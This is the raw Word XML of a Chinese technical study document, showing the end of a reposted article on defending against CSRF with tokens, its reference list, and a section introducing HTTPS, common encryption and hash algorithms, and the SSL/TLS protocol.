              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>5).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>服务端核对令牌：</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这个很简单，这里就不再啰嗦了。</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上面这个其实不完全符合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>并行会话的兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的规则，大家可以在此基础上修改。</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lastRenderedPageBreak/>
        <w:t> </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其实还有很多想写，无奈精力有限，暂且打住，日后补充，如果错漏，请指出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:&gt;</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：今天下午写这篇文档的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>崩溃了一次，写了一半文章的全没了，郁闷好久</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>T_T.......</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转载请说明出处，谢谢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[hyddd(http://www.cnblogs.com/hyddd/)]</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>六</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>参考文献</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[1].</w:t>
      </w:r>
      <w:hyperlink r:id="rId275" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>Preventing CSRF</w:t>
        </w:r>
      </w:hyperlink>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[2].</w:t>
      </w:r>
      <w:hyperlink r:id="rId276" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>Security Corner: Cross-Site Request Forgeries</w:t>
        </w:r>
      </w:hyperlink>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[3].</w:t>
      </w:r>
      <w:hyperlink r:id="rId277" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>《深入解析跨站请求伪造漏洞：原理剖析》</w:t>
        </w:r>
      </w:hyperlink>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[4].</w:t>
      </w:r>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>《</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>Web</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>安全测试之跨站请求伪造（</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>CSRF</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>）》</w:t>
        </w:r>
      </w:hyperlink>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[5].</w:t>
      </w:r>
      <w:hyperlink r:id="rId279" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
            <w:color w:val="3D81EE"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>《深入解析跨站请求伪造漏洞：实例讲解》</w:t>
        </w:r>
      </w:hyperlink>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[6].http://baike.baidu.com/view/1609487.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD43C0" w:rsidRPr="00F41A4C" w:rsidRDefault="00AD43C0" w:rsidP="00AD43C0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阿里巴巴网易</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004510A5" w:rsidRPr="0002691C" w:rsidRDefault="004510A5" w:rsidP="004510A5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见加密解密算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3451" w:rsidRPr="00BE3451" w:rsidRDefault="00BE3451" w:rsidP="00BE3451">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非对称加密算法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DSA/DSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3451" w:rsidRPr="00BE3451" w:rsidRDefault="00BE3451" w:rsidP="00BE3451">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对称加密算法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RC4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3DES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004510A5" w:rsidRPr="004510A5" w:rsidRDefault="00BE3451" w:rsidP="00BE3451">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3451">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C28F7" w:rsidRPr="00F41A4C" w:rsidRDefault="001C28F7" w:rsidP="001C28F7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00F33C4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00F33C4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="00F33C4D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C28F7" w:rsidRDefault="007B662F" w:rsidP="007B662F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2115185" cy="1630045"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="26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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2115185" cy="1630045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005176CE" w:rsidRDefault="00DA54D7" w:rsidP="005176CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w: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25.5pt;height:25.5pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="005176CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3121715" cy="2235059"/>
            <wp:effectExtent l="19050" t="0" r="2485" b="0"/>
            <wp:docPr id="26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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3127708" cy="2239350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B662F" w:rsidRDefault="005176CE" w:rsidP="00AD43C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>介于</w:t>
      </w:r>
      <w:r w:rsidR="0088552A" w:rsidRPr="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>应用层和</w:t>
      </w:r>
      <w:r w:rsidR="0088552A" w:rsidRPr="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="0088552A" w:rsidRPr="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>层之间</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>。应用层数据不再直接传递给传输层，而是传递给</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>层，</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>层对从应用层收到的数据进行加密，并增加自己的</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="0088552A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAF7EF"/>
        </w:rPr>
        <w:t>头。</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL(Secure Sockets Layer </w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全套接层</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及其继任者传输层安全（</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Transport Layer Security</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是为网络通信提供安全及数据完整性的一种安全协议。</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="005F6AA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>传输层</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对网络连接进行加密。</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="007B662F" w:rsidRPr="007B662F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Netscape</w:t>
